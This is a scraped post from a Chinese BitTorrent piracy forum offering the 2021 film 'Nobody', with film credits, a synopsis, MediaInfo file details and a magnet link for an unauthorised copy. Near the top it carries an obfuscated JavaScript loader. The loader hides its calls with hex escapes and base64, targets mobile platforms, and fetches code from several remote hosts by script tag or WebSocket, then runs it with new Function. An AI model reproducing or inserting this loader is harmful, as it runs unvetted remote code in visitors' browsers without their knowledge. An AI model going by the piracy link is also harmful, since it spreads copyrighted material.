小人物[英语音轨/中文字幕].Nobody.2021.1080p.迅雷下载 6.65GB

版主小s 2月前 400

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 小人物 / 杀神NOBODY(港) / 无名弑(台) / 无名小卒

◎片 名 Nobody

◎年 代 2021

◎产 地 美国 / 日本

◎类 别 动作 / 犯罪

◎语 言 西班牙语 / 俄语 / 英语

◎上映日期 2021-03-26(美国)

◎IMDb链接 https://www.imdb.com/title/tt7888964/

◎豆瓣评分 7.9/10 (77756人评价)

◎豆瓣链接 https://movie.douban.com/subject/34865507/

◎片 长 92分钟

◎导 演 伊利亚·奈舒勒 Ilya Naishuller (id:1351832)

◎编 剧 德里克·科尔斯塔 Derek Kolstad (id:1344225)

◎演 员 鲍勃·奥登科克 Bob Odenkirk (id:1027856)

阿列克谢·谢列布里亚科夫 Aleksey Serebryakov (id:1074703)

康妮·尼尔森 Connie Nielsen (id:1009298)

克里斯托弗·洛伊德 Christopher Lloyd (id:1027163)

迈克尔·艾恩塞德 Michael Ironside (id:1007000)

科林·萨蒙 Colin Salmon (id:1314721)

罗伯特·菲茨杰拉德·迪格斯 RZA (id:1009393)

比利·麦克莱伦 Billy MacLellan (id:1118324)

阿拉亚·门格沙 Araya Mengesha (id:1454321)

盖奇·芒罗 Gage Munroe (id:1327831)

佩斯利·卡多拉思 Paisley Cadorath (id:1454322)

亚历山大·帕里 Aleksandr Pal (id:1374197)

亨伯利·冈萨雷斯 Humberly González (id:1393471)

爱德森·莫拉莱斯 Edsson Morales (id:1415025)

J·P·马诺克斯 J.P. Manoux (id:1054883)

伊利亚·奈舒勒 Ilya Naishuller (id:1351832)

谢尔盖·希纳罗维 Sergey Shnurov (id:1306945)

斯蒂芬妮·西 Stephanie Sy (id:1435327)

鲁斯兰·鲁辛 Ruslan Rusin (id:1397341)

Bj·韦罗 Bj Verot (id:1397336)

达雅·查库莎 Darya Charusha (id:1052196)

亚当·哈蒂格 Adam Hurtig (id:1396164)

克里斯汀·哈里斯 Kristen Harris (id:1201708)

埃里克·阿塔瓦尔 Erik Athavale (id:1396160)

沙龙·巴杰 Sharon Bajer (id:1058651)

鲍里斯·古利亚林 Boris Gulyarin (id:1397356)

丹尼尔·伯哈特 Daniel Bernhardt (id:1049890)

阿兰·莫西 Alain Moussi (id:1265433)

泰瑞·威瑟斯庞 Tyrell Witherspoon (id:1325386)

吉姆·科比 Jim Kirby (id:1397357)

大卫·巴克利 David Buckley (id:1437868)

帕维尔·波哥泽尔斯基 Pawel Pogorzelski (id:1430546)

William yeh (id:1455560)

柯克·A·詹金斯 Kirk A. Jenkins (id:1456658)

◎标 签 动作 / 暴力 / 美国 / 犯罪 / 黑色幽默 / 黑帮 / 血腥 / 2021

◎简 介

一天晚上,Hutch(鲍勃·奥登科克BobOdenkirk饰)位于郊区的家中遭两名小偷闯入。为了避免暴力冲突,Hutch没有为自己或是家人反击。他的儿子Blake(盖奇·芒罗GageMunroe饰)对他感到很失望,他的老婆Becca(康妮·尼尔森ConnieNielsen饰)似乎也因此更加疏远他。这起事件激发了Hutch心中压抑许久的情绪和本能,促使他走上残酷的道路,将揭露他黑暗的秘密和致命的能力。在拳头、枪弹和急速行驶的车阵中,Hutch必须从危险的敌人(阿列克谢·谢列布里亚科夫AlexeySerebryakov饰)手中救出自己的家人,并确保别人不会再把他视作无名小卒。

  1. General

  2. Unique ID : 329689686571253138816268037692911050128 (0xF807EC897338DFAF2A0FD60F3660DD90)

  3. Complete name : Nobody.2021.1080p.BluRay.TrueHD.7.1.Atmos.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 6.65 GiB

  7. Duration : 1 h 31 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 10.4 Mb/s

  10. Movie name : Nobody 2021 1080p BluRay TrueHD 7.1 Atmos x265-10bit-HDS

  11. Encoded date : UTC 2021-06-19 20:30:39

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 31 min

  21. Bit rate : 7 107 kb/s

  22. Width : 1 920 pixels

  23. Height : 804 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.192

  31. Stream size : 4.55 GiB (68%)

  32. Title : [email protected]

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio #1

  37. ID : 2

  38. Format : MLP FBA 16-ch

  39. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  40. Commercial name : Dolby TrueHD with Dolby Atmos

  41. Codec ID : A_TRUEHD

  42. Duration : 1 h 31 min

  43. Bit rate mode : Variable

  44. Bit rate : 2 697 kb/s

  45. Maximum bit rate : 4 788 kb/s

  46. Channel(s) : 8 channels

  47. Channel layout : L R C LFE Ls Rs Lb Rb

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 1 200.000 FPS (40 SPF)

  50. Compression mode : Lossless

  51. Stream size : 1.73 GiB (26%)

  52. Title : English

  53. Language : English

  54. Default : Yes

  55. Forced : No

  56. Number of dynamic objects : 11

  57. Bed channel count : 1 channel

  58. Bed channel configuration : LFE


  59. Audio #2

  60. ID : 3

  61. Format : AC-3

  62. Format/Info : Audio Coding 3

  63. Commercial name : Dolby Digital

  64. Codec ID : A_AC3

  65. Duration : 1 h 31 min

  66. Bit rate mode : Constant

  67. Bit rate : 448 kb/s

  68. Channel(s) : 6 channels

  69. Channel layout : L R C LFE Ls Rs

  70. Sampling rate : 48.0 kHz

  71. Frame rate : 31.250 FPS (1536 SPF)

  72. Compression mode : Lossy

  73. Stream size : 294 MiB (4%)

  74. Service kind : Complete Main

  75. Default : No

  76. Forced : No


  77. Text #1

  78. ID : 4

  79. Format : PGS

  80. Muxing mode : zlib

  81. Codec ID : S_HDMV/PGS

  82. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration : 1 h 28 min

  84. Bit rate : 18.6 kb/s

  85. Count of elements : 1896

  86. Stream size : 11.7 MiB (0%)

  87. Title : CHS

  88. Language : Chinese

  89. Default : Yes

  90. Forced : No


  91. Text #2

  92. ID : 5

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 1 h 28 min

  98. Bit rate : 19.2 kb/s

  99. Count of elements : 1896

  100. Stream size : 12.1 MiB (0%)

  101. Title : CHT

  102. Language : Chinese

  103. Default : No

  104. Forced : No


  105. Text #3

  106. ID : 6

  107. Format : PGS

  108. Muxing mode : zlib

  109. Codec ID : S_HDMV/PGS

  110. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  111. Duration : 1 h 28 min

  112. Bit rate : 31.4 kb/s

  113. Count of elements : 1896

  114. Stream size : 19.8 MiB (0%)

  115. Title : CHS&ENG

  116. Language : Chinese

  117. Default : No

  118. Forced : No


  119. Text #4

  120. ID : 7

  121. Format : PGS

  122. Muxing mode : zlib

  123. Codec ID : S_HDMV/PGS

  124. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  125. Duration : 1 h 28 min

  126. Bit rate : 31.9 kb/s

  127. Count of elements : 1896

  128. Stream size : 20.1 MiB (0%)

  129. Title : CHT&ENG

  130. Language : Chinese

  131. Default : No

  132. Forced : No


  133. Text #5

  134. ID : 8

  135. Format : PGS

  136. Muxing mode : zlib

  137. Codec ID : S_HDMV/PGS

  138. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  139. Duration : 1 h 28 min

  140. Bit rate : 30.4 kb/s

  141. Count of elements : 2284

  142. Stream size : 19.2 MiB (0%)

  143. Title : ENG

  144. Language : English

  145. Default : No

  146. Forced : No


  147. Menu

  148. 00:00:00.000 : en:Chapter 01

  149. 00:09:01.916 : en:Chapter 02

  150. 00:15:02.693 : en:Chapter 03

  151. 00:19:18.199 : en:Chapter 04

  152. 00:24:56.286 : en:Chapter 05

  153. 00:35:37.469 : en:Chapter 06

  154. 00:40:01.065 : en:Chapter 07

  155. 00:43:43.204 : en:Chapter 08

  156. 00:47:29.221 : en:Chapter 09

  157. 00:50:56.136 : en:Chapter 10

  158. 00:54:46.783 : en:Chapter 11

  159. 00:57:32.074 : en:Chapter 12

  160. 01:04:16.686 : en:Chapter 13

  161. 01:06:54.844 : en:Chapter 14

  162. 01:08:59.802 : en:Chapter 15

  163. 01:13:20.646 : en:Chapter 16

  164. 01:15:26.355 : en:Chapter 17

  165. 01:21:05.569 : en:Chapter 18

  166. 01:24:06.500 : en:Chapter 19

  167. 01:26:16.963 : en:Chapter 20




TAGS 动作 犯罪

磁力链:
  • magnet:?xt=urn:btih:49B4EFEB53F0B778D758A937DE711C2A58586D02
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回